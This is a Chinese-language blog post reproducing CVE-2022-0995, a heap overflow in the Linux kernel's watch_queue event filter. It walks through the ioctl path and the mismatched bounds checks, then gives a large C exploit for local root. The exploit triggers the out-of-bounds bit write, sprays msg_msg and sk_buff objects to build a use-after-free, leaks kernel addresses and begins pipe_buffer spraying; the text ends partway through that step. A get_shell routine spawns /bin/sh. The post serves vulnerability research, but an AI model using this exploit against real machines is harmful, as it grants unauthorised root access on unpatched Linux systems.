CVE-2022-0995复现 | 196082's blog

前言

其实前两天复现了一个2023的CVE，本来打算写那一个的，但是对于那个CVE更多的是做工作上的适配，在一些小细节上的原理并没有掌握得特别透彻，并且因为是刚刚公开的一个CVE也导致没有更多的文章进行参考，等后面进一步分析一下源码再写。

此次的CVE是存在于观察队列事件通知子系统 (watch_queue event notification subsystem) 中的一个堆溢出漏洞，该漏洞从内核版本5.8伴随着 watch queue subsystem 引入，在 5.17-rc8 得到修复。

基础知识

通用通知机制是建立在标准管道驱动之上的，其可以有效地将来自内核的通知消息拼接到用户打开的管道中，我们可以通过 CONFIG_WATCH_QUEUE 编译选项启用（默认开启）

该机制通过一个以特殊模式打开的管道实现，内核生成的消息被保存到管道内部的循环环形缓冲区中（pipe_buffer 队列），通过 read() 进行读取。由于 splice 及类似操作在某些情况下需要撤销其已经添加到环中的内容，而这些内容可能已经与通知消息交织在一起，因此在此类管道上禁用了 splice 以及类似功能

管道的所有者应当告诉内核哪些资源其想要通过该管道进行观察，只有连接到该管道上的资源才会往里边插入消息，需要注意的是一个资源可能会与多个管道绑定并同时将消息插入所有管道

若环中没有可用的插槽或可用的预分配的 message buffer（一个管道默认只有 16 个 pipe_buffer ——对应 16 张内存页），则消息将会被丢弃，在这两种情况下，read() 将在读取当前缓冲区的最后一条消息后将 WATCH_META_LOSS_NOTIFICATION 插入输出缓冲区。

Watch Queue API

一个观测队列（watch queue）是由一个应用分配的用以记录通知的缓冲区，其工作原理完全隐藏在管道设备驱动中，但有必要获得一个对其的引用以设置一个观测，可以通过以下 API 进行管理：

struct watch_queue *get_watch_queue(int fd);

由于观测队列在内核中通过实现缓冲区的管道的文件描述符表示，用户空间必须通过系统调用传递该文件描述符，这可以用于从系统调用中查找指向观测队列的不透明指针
void put_watch_queue(struct watch_queue *wqueue);

该函数用以丢弃从 get_watch_queue() 获得的引用

Event Filter

当一个观测队列被创建后，我们可以使用过滤器限制接收的事件：

/*
 * User-space argument of ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, ...):
 * a small header followed by nr_filters entries in filters[].
 */
struct watch_notification_filter {
	__u32	nr_filters;		/* Number of filters */
	__u32	__reserved;		/* Must be 0 */
	struct watch_notification_type_filter filters[];
};
struct watch_notification_filter filter = {
        ...
};
ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, &filter)

这里主要解释一下结构体中的成员的含义，nr_filters成员表示的是filters[]数组中过滤器的数量，而可以看出来__reserved是必须置0的。需要注意的是其中filters[]数组的类型为watch_notification_type_filter：

/*
 * One user-supplied filter entry. A notification of the given type is
 * written to the buffer only when (watch.info & info_mask) == info_filter;
 * subtype_filter is a bitmask in which bit N stands for subtype N.
 */
struct watch_notification_type_filter {
	__u32	type;			/* Type to apply filter to */
	__u32	info_filter;		/* Filter on watch_notification::info */
	__u32	info_mask;		/* Mask of relevant bits in info_filter */
	__u32	subtype_filter[8];	/* Bitmask of subtypes to filter on */
};

这里也简单介绍一下该结构体中各成员的含义，首先是type，代表的是需要过滤的事件的类型：

/* Event types that the `type` field of a filter entry can name. */
enum watch_notification_type {
	WATCH_TYPE_META		= 0,	/* Special record */
	WATCH_TYPE_KEY_NOTIFY	= 1,	/* Key change event notification */
	WATCH_TYPE__NR		= 2
};

info_filter成员与info_mask成员充当的是通知记录的信息字段的过滤器，仅当如下情况才会将通知写入缓冲区：

(watch.info & info_mask) == info_filter

subtype_filter成员则是指示我们感兴趣的子类型的bitmask，subtype_filter[0]的0位对应子类型0，1位对应子类型1…

若是上面使用ioctl(fd, IOC_WATCH_QUEUE_SET_FILTER, NULL)则为移除过滤器，此时接收所有来自观测的信息。

watch queue subsystem 中 Event Filter 实现

/*
 * ioctl(2) entry point. Resolves fd to a file, runs the security hook,
 * tries do_vfs_ioctl() first and, only when that answers -ENOIOCTLCMD,
 * falls back to vfs_ioctl().
 *
 * Returns -EBADF when fd does not resolve to a file; otherwise the value
 * produced by the security hook or by whichever handler ran.
 */
SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd, unsigned long, arg)
{
	struct fd f = fdget(fd);
	int error;

	if (!f.file)
		return -EBADF;

	/* A non-zero result from the security hook ends the call early. */
	error = security_file_ioctl(f.file, cmd, arg);
	if (error)
		goto out;

	error = do_vfs_ioctl(f.file, fd, cmd, arg);
	/* -ENOIOCTLCMD here means do_vfs_ioctl() did not handle cmd. */
	if (error == -ENOIOCTLCMD)
		error = vfs_ioctl(f.file, cmd, arg);

out:
	/* Pairs with the fdget() at the top; runs on every path past the NULL check. */
	fdput(f);
	return error;
}

首先，我们调用ioctl时会进入如上函数，通过验证之后会先调用do_vfs_ioctl函数，而这个函数内部就是一个硕大的switch语句，根据cmd进行处理，但是IOC_WATCH_QUEUE_SET_FILTER并不在其中（此时返回-ENOIOCTLCMD），所以最终会调用到vfs_ioctl函数。

/*
 * Forward cmd/arg to the file's own ->unlocked_ioctl handler.
 *
 * Returns -ENOTTY when the file has no ->unlocked_ioctl, or when the
 * handler answers -ENOIOCTLCMD; any other handler result is returned
 * unchanged.
 */
long vfs_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	int error = -ENOTTY;

	if (!filp->f_op->unlocked_ioctl)
		goto out;

	error = filp->f_op->unlocked_ioctl(filp, cmd, arg);
	/* Translate "handler does not know this cmd" into -ENOTTY. */
	if (error == -ENOIOCTLCMD)
		error = -ENOTTY;
 out:
	return error;
}
EXPORT_SYMBOL(vfs_ioctl);

可以注意到的是这里其实调用的是filp->f_op->unlocked_ioctl函数，所以首要就是要搞明白这是个什么函数。

前文提到，通知机制是建立在管道上面的，所以这里文件描述符其实也就是管道的，那么我们当前则需要更多的将目光放在管道的创建上面，而管道的创建存在以下调用关系：do_pipe2() => __do_pipe_flags() => create_pipe_files() => alloc_file_pseudo() => alloc_file()。

/*
 * Allocate a struct file for @path and attach @fop as its operations table.
 *
 * @path:  path whose dentry/inode the new file refers to
 * @flags: passed through to alloc_empty_file()
 * @fop:   file_operations stored in file->f_op
 *
 * Returns the new file, or the error pointer returned by
 * alloc_empty_file() when that allocation fails.
 */
static struct file *alloc_file(const struct path *path, int flags,
		const struct file_operations *fop)
{
	struct file *file;

	file = alloc_empty_file(flags, current_cred());
	if (IS_ERR(file))
		return file;

	file->f_path = *path;
	file->f_inode = path->dentry->d_inode;
	file->f_mapping = path->dentry->d_inode->i_mapping;
	file->f_wb_err = filemap_sample_wb_err(file->f_mapping);
	file->f_sb_err = file_sample_sb_err(file);
	/* CAN_READ/CAN_WRITE are set only if fop supplies a matching method. */
	if ((file->f_mode & FMODE_READ) &&
	     likely(fop->read || fop->read_iter))
		file->f_mode |= FMODE_CAN_READ;
	if ((file->f_mode & FMODE_WRITE) &&
	     likely(fop->write || fop->write_iter))
		file->f_mode |= FMODE_CAN_WRITE;
	file->f_mode |= FMODE_OPENED;
	/* f_op is assigned here; vfs_ioctl() later calls f_op->unlocked_ioctl. */
	file->f_op = fop;
	/* Files opened for reading only also go through i_readcount_inc(). */
	if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
		i_readcount_inc(path->dentry->d_inode);
	return file;
}

可以看到的是这里对于ops的赋值是发生在这个位置的。

/*
 * Create the two struct files that make up a pipe.
 *
 * @res:   output array; res[0] receives the O_RDONLY file, res[1] the
 *         O_WRONLY file
 * @flags: pipe2()-style flags; O_NOTIFICATION_PIPE additionally runs
 *         watch_queue_init() on the new pipe before any file is created
 *
 * Both files use pipefifo_fops and carry inode->i_pipe in private_data.
 *
 * Returns 0 on success, -ENFILE when no pipe inode could be obtained, or
 * the error reported by watch_queue_init() / the file allocation helpers.
 */
int create_pipe_files(struct file **res, int flags)
{
	struct inode *inode = get_pipe_inode();
	struct file *f;
	int error;

	if (!inode)
		return -ENFILE;

	/* Notification pipes get their watch queue set up first. */
	if (flags & O_NOTIFICATION_PIPE) {
		error = watch_queue_init(inode->i_pipe);
		if (error) {
			free_pipe_info(inode->i_pipe);
			iput(inode);
			return error;
		}
	}

	/* Write side: this is where &pipefifo_fops is handed down as the f_op. */
	f = alloc_file_pseudo(inode, pipe_mnt, "",
				O_WRONLY | (flags & (O_NONBLOCK | O_DIRECT)),
				&pipefifo_fops);
	if (IS_ERR(f)) {
		free_pipe_info(inode->i_pipe);
		iput(inode);
		return PTR_ERR(f);
	}

	f->private_data = inode->i_pipe;

	/* Read side: cloned from the write-side file, same fops. */
	res[0] = alloc_file_clone(f, O_RDONLY | (flags & O_NONBLOCK),
				  &pipefifo_fops);
	if (IS_ERR(res[0])) {
		put_pipe_info(inode, inode->i_pipe);
		fput(f);
		return PTR_ERR(res[0]);
	}
	res[0]->private_data = inode->i_pipe;
	res[1] = f;
	stream_open(inode, res[0]);
	stream_open(inode, res[1]);
	return 0;
}

而真正传入ops的位置则在create_pipe_files函数内部，可以看到传入的ops其实就是pipefifo_fops变量。

/*
 * File operations that create_pipe_files() installs on both ends of a
 * pipe. Its .unlocked_ioctl entry (pipe_ioctl) is therefore what
 * vfs_ioctl() ends up calling for an ioctl() on a pipe fd.
 */
const struct file_operations pipefifo_fops = {
	.open		= fifo_open,
	.llseek		= no_llseek,
	.read_iter	= pipe_read,
	.write_iter	= pipe_write,
	.poll		= pipe_poll,
	.unlocked_ioctl	= pipe_ioctl,
	.release	= pipe_release,
	.fasync		= pipe_fasync,
	.splice_write	= iter_file_splice_write,
};

可以看到unlocked_ioctl对应的也就是pipe_ioctl函数。

/*
 * ioctl handler for pipes (the .unlocked_ioctl entry of pipefifo_fops).
 *
 * Handles FIONREAD and, when CONFIG_WATCH_QUEUE is enabled,
 * IOC_WATCH_QUEUE_SET_SIZE and IOC_WATCH_QUEUE_SET_FILTER.
 * Any other cmd yields -ENOIOCTLCMD.
 */
static long pipe_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	struct pipe_inode_info *pipe = filp->private_data;
	int count, head, tail, mask;

	switch (cmd) {
	case FIONREAD:
		/* Sum the len of every buffer between tail and head, under the pipe lock. */
		__pipe_lock(pipe);
		count = 0;
		head = pipe->head;
		tail = pipe->tail;
		mask = pipe->ring_size - 1;

		while (tail != head) {
			count += pipe->bufs[tail & mask].len;
			tail++;
		}
		__pipe_unlock(pipe);

		/* The total is written to the user-space int that arg points to. */
		return put_user(count, (int __user *)arg);

#ifdef CONFIG_WATCH_QUEUE
	case IOC_WATCH_QUEUE_SET_SIZE: {
		int ret;
		__pipe_lock(pipe);
		ret = watch_queue_set_size(pipe, arg);
		__pipe_unlock(pipe);
		return ret;
	}

	/*
	 * arg is a user pointer to a struct watch_notification_filter.
	 * Unlike SET_SIZE, no lock is taken here before the call.
	 */
	case IOC_WATCH_QUEUE_SET_FILTER:
		return watch_queue_set_filter(
			pipe, (struct watch_notification_filter __user *)arg);
#endif

	default:
		return -ENOIOCTLCMD;
	}
}

而该函数内部其实也就是一个大的switch语句，其中最后一个分支（IOC_WATCH_QUEUE_SET_FILTER）会调用watch_queue_set_filter函数，而漏洞正发生在其中。

漏洞分析

漏洞点一

/*
 * Install, replace or remove the event filter of a notification pipe.
 *
 * @pipe:    pipe whose ->watch_queue receives the filter
 * @_filter: user pointer to the filter specification; NULL removes the
 *           current filter
 *
 * Returns 0 on success, -ENODEV if the pipe has no watch queue, -EFAULT if
 * the header cannot be copied in, -EINVAL for a bad header or a bad
 * info_filter/info_mask pair, -ENOMEM if the internal filter cannot be
 * allocated, or the error from memdup_user().
 *
 * NOTE: this is the pre-fix code that the article analyses. The loop that
 * counts entries and the loop that copies them use different upper bounds
 * for tf[i].type; see the comments on the two loops below.
 */
long watch_queue_set_filter(struct pipe_inode_info *pipe,
			    struct watch_notification_filter __user *_filter)
{
	struct watch_notification_type_filter *tf;
	struct watch_notification_filter filter;
	struct watch_type_filter *q;
	struct watch_filter *wfilter;
	struct watch_queue *wqueue = pipe->watch_queue;
	int ret, nr_filter = 0, i;

	if (!wqueue)
		return -ENODEV;

	if (!_filter) {
		/* Remove the old filter */
		wfilter = NULL;
		goto set;
	}

	/* Grab the user's filter specification */
	if (copy_from_user(&filter, _filter, sizeof(filter)) != 0)
		return -EFAULT;
	if (filter.nr_filters == 0 ||
	    filter.nr_filters > 16 ||
	    filter.__reserved != 0)
		return -EINVAL;

	/* Kernel copy of the nr_filters user entries; freed on every exit path below. */
	tf = memdup_user(_filter->filters, filter.nr_filters * sizeof(*tf));
	if (IS_ERR(tf))
		return PTR_ERR(tf);

	/*
	 * Pass 1: validate each entry and count, in nr_filter, those whose
	 * type is below sizeof(type_filter) * 8. That count is what sizes the
	 * allocation further down.
	 */
	ret = -EINVAL;
	for (i = 0; i < filter.nr_filters; i++) {
		if ((tf[i].info_filter & ~tf[i].info_mask) ||
		    tf[i].info_mask & WATCH_INFO_LENGTH)
			goto err_filter;
		/* Ignore any unknown types */
		if (tf[i].type >= sizeof(wfilter->type_filter) * 8)
			continue;
		nr_filter++;
	}

	/* Now we need to build the internal filter from only the relevant
	 * user-specified filters.
	 */
	ret = -ENOMEM;
	wfilter = kzalloc(struct_size(wfilter, filters, nr_filter), GFP_KERNEL);
	if (!wfilter)
		goto err_filter;
	wfilter->nr_filters = nr_filter;

	/*
	 * Pass 2: copy the entries into wfilter->filters[].
	 *
	 * The skip test here multiplies by BITS_PER_LONG, not by 8 as pass 1
	 * does, so its bound is larger. An entry whose type lies between the
	 * two bounds was NOT counted in nr_filter but IS copied here, which
	 * means (a) q can be advanced and written beyond the nr_filter slots
	 * that were allocated, and (b) __set_bit() is handed a bit index that
	 * lies beyond the type_filter bitmap.
	 */
	q = wfilter->filters;
	for (i = 0; i < filter.nr_filters; i++) {
		if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
			continue;

		q->type			= tf[i].type;
		q->info_filter		= tf[i].info_filter;
		q->info_mask		= tf[i].info_mask;
		/* Only the first word of the user's subtype_filter[] is kept. */
		q->subtype_filter[0]	= tf[i].subtype_filter[0];
		__set_bit(q->type, wfilter->type_filter);
		q++;
	}

	kfree(tf);
set:
	/*
	 * Swap the new filter (or NULL) in under the pipe lock; what comes
	 * back is the previous filter, which is freed via kfree_rcu().
	 */
	pipe_lock(pipe);
	wfilter = rcu_replace_pointer(wqueue->filter, wfilter,
				      lockdep_is_held(&pipe->mutex));
	pipe_unlock(pipe);
	if (wfilter)
		kfree_rcu(wfilter, rcu);
	return 0;

err_filter:
	kfree(tf);
	return ret;
}

首先是将用户空间的_filter拷贝到内核中，接着就是对结构体中的nr_filters和__reserved成员进行验证。

if (copy_from_user(&filter, _filter, sizeof(filter)) != 0)
  return -EFAULT;
if (filter.nr_filters == 0 ||
    filter.nr_filters > 16 ||
    filter.__reserved != 0)
  return -EINVAL;

接下来通过memdup_user函数将用户态struct watch_notification_type_filter filters[]数组放到临时的内存空间tf中。紧接着将根据filter.nr_filters进行for循环，并对tf中的内容进行校验。待都通过则会根据struct_size(wfilter, filters, nr_filter)生成一个object，而这个宏的含义其实是sizeof(*wfilter) + sizeof(wfilter->filters[0]) * nr_filter（并带有溢出检查），即结构体头部加上nr_filter个数组元素的大小。并且需要注意的是这里nr_filter并不是任何结构体中的成员，只是函数声明的一个局部变量

for (i = 0; i < filter.nr_filters; i++) {
  if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)
    continue;

  q->type			= tf[i].type;
  q->info_filter		= tf[i].info_filter;
  q->info_mask		= tf[i].info_mask;
  q->subtype_filter[0]	= tf[i].subtype_filter[0];
  __set_bit(q->type, wfilter->type_filter);
  q++;
}

如上代码片段，后面这个for循环同样以filter.nr_filters作为循环次数，但这里对于type的验证和上面统计nr_filter时的并不相同。

#ifdef CONFIG_64BIT
#define BITS_PER_LONG 64
#else
#define BITS_PER_LONG 32
#endif /* CONFIG_64BIT */

if (tf[i].type >= sizeof(wfilter->type_filter) * 8)

if (tf[i].type >= sizeof(wfilter->type_filter) * BITS_PER_LONG)

由于type_filter为unsigned long[2]（64位下共16字节），前一处检查的上界为16 * 8 = 0x80，后一处检查的上界为16 * 64 = 0x400，所以不难想到可以通过指定type的值为[0x80, 0x400)区间内的特定值来实现越界写。

漏洞点二

而第二个漏洞也位于在最后赋值时的__set_bit函数中

/* Mask with only bit (nr % BITS_PER_LONG) set, i.e. the bit's position inside its word. */
#define BIT_MASK(nr)		(UL(1) << ((nr) % BITS_PER_LONG))
/* Index of the unsigned long word, counted from the bitmap start, that holds bit nr. */
#define BIT_WORD(nr)		((nr) / BITS_PER_LONG)

/*
 * Set bit nr in the bitmap that starts at addr, using a plain |= on the
 * word that holds it.
 *
 * Nothing here checks nr against the size of the bitmap: the word written
 * is addr[BIT_WORD(nr)], wherever that lands, so the caller must bound nr.
 */
static inline void __set_bit(int nr, volatile unsigned long *addr)
{
	unsigned long mask = BIT_MASK(nr);
	unsigned long *p = ((unsigned long *)addr) + BIT_WORD(nr);

	*p  |= mask;
}

这个函数的作用就是将addr偏移为BIT_WORD(nr)处的BIT_MASK(nr)位置为1，因为type是可控的，所以控制得当的话可以越界置一位为1。

/*
 * Kernel-internal form of one filter entry. watch_queue_set_filter() fills
 * it from the user's struct watch_notification_type_filter, keeping only
 * the first subtype_filter word.
 */
struct watch_type_filter {
	enum watch_notification_type type;
	__u32		subtype_filter[1];	/* Bitmask of subtypes to filter on */
	__u32		info_filter;		/* Filter on watch_notification::info */
	__u32		info_mask;		/* Mask of relevant bits in info_filter */
};

/*
 * Kernel-internal filter attached to a watch queue.
 *
 * type_filter shares its storage with rcu through the union; it is a
 * bitmap of two unsigned longs, so it only has room for bit indices
 * 0 .. 2 * BITS_PER_LONG - 1. filters[] is a flexible array whose length is
 * fixed at allocation time (struct_size(wfilter, filters, nr_filter) in
 * watch_queue_set_filter()).
 */
struct watch_filter {
	union {
		struct rcu_head	rcu;
		unsigned long	type_filter[2];	/* Bitmask of accepted types */
	};
	u32			nr_filters;	/* Number of filters */
	struct watch_type_filter filters[];
};

上面的watch_filter长这样。

漏洞利用

网上的有关这个CVE使用的方法几乎都是利用的漏洞二。当然，仔细想一下也会发现漏洞二在利用的过程中更为易用。接着就是思考溢出问题了，若是我们选择一个type为0x30a的话，我们得到的偏移为(0x30a / 64) * 8 = 0x60，所以我们只需要让上面的object的大小为0x60即可影响到后面的object了。所以我们这里选择的nr_filters为4，除去上面的这一个即为3。那么此时内核给wfilter分配的大小为0x18 + 3 * 0x10 = 0x48所以可以申请到0x60的object。这时再根据BIT_MASK计算可得最终结果为0x400。

其实说到这里的时候各位应该都想到了解题方法了吧。对的，可以使用 CVE-2021-22555 即可完成后续利用 (这里不再详细解释了)。

综上，可得exp

#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/watch_queue.h>
#include <sys/syscall.h>

struct callback_head
{
    struct callback_head *next;
    void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));

#define rcu_head callback_head

struct watch_type_filter
{
    enum watch_notification_type type;
    unsigned int subtype_filter[1]; /* Bitmask of subtypes to filter on */
    unsigned int info_filter;       /* Filter on watch_notification::info */
    unsigned int info_mask;         /* Mask of relevant bits in info_filter */
};

struct watch_filter
{
    union
    {
        struct rcu_head rcu;
        unsigned long type_filter[2]; /* Bitmask of accepted types */
    };
    unsigned int nr_filters; /* Number of filters */
    struct watch_type_filter filters[];
};

void errExit(char *err_msg)
{
    puts(err_msg);
    exit(-1);
}

size_t user_cs, user_ss, user_sp, user_rflags;
void save_status()
{
    __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;");
    puts("[*]status has been saved.");
}

#define MSG_COPY 040000
#define MSG_TAG 0xAAAAAAAA
#define PRIMARY_MSG_TYPE 0x41
#define SECONDARY_MSG_TYPE 0x42

#define MSG_QUEUE_NUM 4096

#define PRIMARY_MSG_SIZE 96
#define SECONDARY_MSG_SIZE 0x400
#define VICTIM_MSG_TYPE 0x1337

#define SOCKET_NUM 32
#define SK_BUFF_NUM 128
#define PIPE_NUM 256
#define OOB_PIPE_NUM 100

struct list_head
{
    struct list_head *next, *prev;
};

struct msg_msgseg
{
    uint64_t next;
};

struct msg_msg
{
    struct list_head m_list;
    long m_type;
    size_t m_ts;    /* message text size */
    void *next;     /* struct msg_msgseg *next; */
    void *security; /* NULL without SELinux */
    /* the actual message follows immediately */
};

struct pipe_buffer
{
    uint64_t page;
    uint32_t offset, len;
    uint64_t ops;
    uint32_t flags;
    uint32_t padding;
    uint64_t private;
};

struct pipe_buf_operations
{
    uint64_t confirm;
    uint64_t release;
    uint64_t try_steal;
    uint64_t get;
};

struct
{
    long mtype;
    char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
} primary_msg;

struct
{
    long mtype;
    char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
} secondary_msg;

struct
{
    long mtype;
    char mtext[0x1000 - sizeof(struct msg_msg) + 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

void get_shell()
{
    if (getuid())
    {
        printf("\033[31m\033[1m[x] Failed to get the root!\033[0m\n");
        exit(-1);
    }
    printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
    system("/bin/sh");
}

void trigger_overflow(int oob_pipe[2])
{
    struct watch_notification_filter *wfilter;
    unsigned int nfilters;

    nfilters = 4;
    wfilter = (struct watch_notification_filter *)
        calloc(1, sizeof(struct watch_notification_filter) + nfilters * sizeof(struct watch_notification_type_filter));
    wfilter->nr_filters = nfilters;

    for (int i = 0; i < (nfilters - 1); i++)
        wfilter->filters[i].type = 1;

    wfilter->filters[nfilters - 1].type = 0x30a;

    if (ioctl(oob_pipe[0], IOC_WATCH_QUEUE_SET_FILTER, wfilter) < 0)
        errExit("failed to ioctl IOC_WATCH_QUEUE_SET_FILTER!");

    free(wfilter);
}

int main()
{
    save_status();

    int oob_pipe_fd[2];
    int i = 0;
    char *buf = malloc(0x2000);
    int sk_sockets[SOCKET_NUM][2];
    int msqid[MSG_QUEUE_NUM];
    int victim_qid = -1;
    char fake_secondary_msg[704];
    int oob_qid = -1;
    struct msg_msg *nearby_msg;
    struct msg_msg *nearby_msg_prim;
    int pipe_fd[PIPE_NUM][2];
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(0, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    for (int i = 0; i < SOCKET_NUM; i++)
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]) < 0)
            errExit("failed to create socket pair!");

    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0)
            errExit("failed to create msg_queue!");
    }

    puts("\n\033[34m\033[1m[*] spray msg_msg, construct overlapping object\033[0m");

    memset(&primary_msg, 0, sizeof(primary_msg));
    memset(&secondary_msg, 0, sizeof(secondary_msg));
    *(long *)&primary_msg = PRIMARY_MSG_TYPE;
    *(long *)&secondary_msg = SECONDARY_MSG_TYPE;
    *(int *)&primary_msg.mtext[0] = MSG_TAG;
    *(int *)&secondary_msg.mtext[0] = MSG_TAG;
    strcpy(&primary_msg.mtext[0x8], "this is first msg_msg!");

    if (pipe2(oob_pipe_fd, O_NOTIFICATION_PIPE) < 0)
        errExit("failed to create O_NOTIFICATION_PIPE!");

    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        *(int *)&primary_msg.mtext[0] = MSG_TAG;
        *(int *)&primary_msg.mtext[4] = i;
        if (msgsnd(msqid[i], &primary_msg,
                   sizeof(primary_msg) - 8, 0) < 0)
            errExit("failed to send primary msg!");

        *(int *)&secondary_msg.mtext[0] = MSG_TAG;
        *(int *)&secondary_msg.mtext[4] = i;
        if (msgsnd(msqid[i], &secondary_msg,
                   sizeof(secondary_msg) - 8, 0) < 0)
            errExit("failed to send secondary msg!");
    }

    puts("[*] Create holes in primary msg_msg...");
    for (int i = 0; i < MSG_QUEUE_NUM; i += 1024)
    {
        if (msgrcv(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE, 0) < 0)
        {
            errExit("failed to read msg!");
        }
    }

    trigger_overflow(oob_pipe_fd);

    puts("\n\033[34m\033[1m[*] construct UAF\033[0m");

    for (int i = 0; i < MSG_QUEUE_NUM; i++)
    {
        if (i % 1024 == 0)
        {
            continue;
        }
        if (msgrcv(msqid[i], &secondary_msg, sizeof(secondary_msg) - 8, 1, MSG_COPY | IPC_NOWAIT) < 0)
        {
            errExit("failed to read msg!");
        }
        if (*(int *)&secondary_msg.mtext[4] != i)
        {
            victim_qid = i;
            oob_qid = *(int *)&secondary_msg.mtext[4];
        }
    }
    if (victim_qid == -1 || oob_qid == -1)
    {
        errExit("[-] failed find victim msg!");
    }
    printf("[+] find victim id: %d, oob id: %d\n", victim_qid, oob_qid);

    if (msgrcv(msqid[oob_qid], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE, 0) < 0)
    {
        errExit("failed to read msg!");
    }

    ((struct msg_msg *)fake_secondary_msg)->m_list.next = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_list.prev = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_type = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_ts = 0x1000 - sizeof(struct msg_msg);
    ((struct msg_msg *)fake_secondary_msg)->next = NULL;
    ((struct msg_msg *)fake_secondary_msg)->security = NULL;

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (write(sk_sockets[i][0], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to spray sk_buff!");
            }
        }
    }

    if (msgrcv(msqid[victim_qid], &oob_msg, sizeof(oob_msg) - 8, 1, MSG_COPY | IPC_NOWAIT) < 0)
    {
        errExit("failed to read victim msg!");
    }

    if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE] != MSG_TAG)
        errExit("failed to rehit the UAF object!");

    nearby_msg = (struct msg_msg *)&oob_msg.mtext[(SECONDARY_MSG_SIZE - sizeof(struct msg_msg))];
    printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m%p\n",
           nearby_msg->m_list.prev);

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (read(sk_sockets[i][1], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to release sk_buff!");
            }
        }
    }

    uint64_t search_addr = (unsigned long *)nearby_msg->m_list.prev;
    search_addr = search_addr - 8;

    ((struct msg_msg *)fake_secondary_msg)->m_list.next = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_list.prev = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_type = NULL;
    ((struct msg_msg *)fake_secondary_msg)->m_ts = sizeof(oob_msg.mtext);
    ((struct msg_msg *)fake_secondary_msg)->next = search_addr;
    ((struct msg_msg *)fake_secondary_msg)->security = NULL;
    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (write(sk_sockets[i][0], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to spray sk_buff!");
            }
        }
    }
    if (msgrcv(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1, MSG_COPY | IPC_NOWAIT) < 0)
    {
        errExit("failed to read victim msg!");
    }

    if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
        errExit("failed to rehit the UAF object!");

    nearby_msg_prim = (struct msg_msg *)&oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
    uint64_t victim_addr = (unsigned long *)(nearby_msg_prim->m_list.next);
    victim_addr = victim_addr - 0x400;

    printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m%p\n",
           nearby_msg_prim->m_list.next);
    printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m%p\n", victim_addr);

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (read(sk_sockets[i][1], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to release sk_buff!");
            }
        }
    }
    puts("\n\033[34m\033[1m[*] spray pipe_buffer to leak kernel base\033[0m");

    ((struct msg_msg *)fake_secondary_msg)->m_list.next = victim_addr + 0x800;
    ((struct msg_msg *)fake_secondary_msg)->m_list.prev = victim_addr + 0x800;
    ((struct msg_msg *)fake_secondary_msg)->m_type = VICTIM_MSG_TYPE;
    ((struct msg_msg *)fake_secondary_msg)->m_ts = 1024 - 0x30;
    ((struct msg_msg *)fake_secondary_msg)->next = NULL;
    ((struct msg_msg *)fake_secondary_msg)->security = NULL;

    for (int i = 0; i < SOCKET_NUM; i++)
    {
        for (int j = 0; j < SK_BUFF_NUM; j++)
        {
            if (write(sk_sockets[i][0], fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
            {
                errExit("failed to spray sk_buff!");
            }
        }
    }
    if (msgrcv(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE, IPC_NOWAIT | MSG_NOERROR) < 0)
    {
        errExit("failed to read victim msg!");
    }

    for (int i = 0; i < PIPE_NUM; i++)
    {
        if (pipe(pipe_fd[i]) < 0)
            errExit("failed to create pipe!");

        if (write(pipe_fd[i][1], "196082", 6) < 0)
            errExit("failed to write the pipe!");
    }
    struct pipe_buffer *pipe_buf_ptr = (struct pipe_buffer *)&fake_secondary_msg;
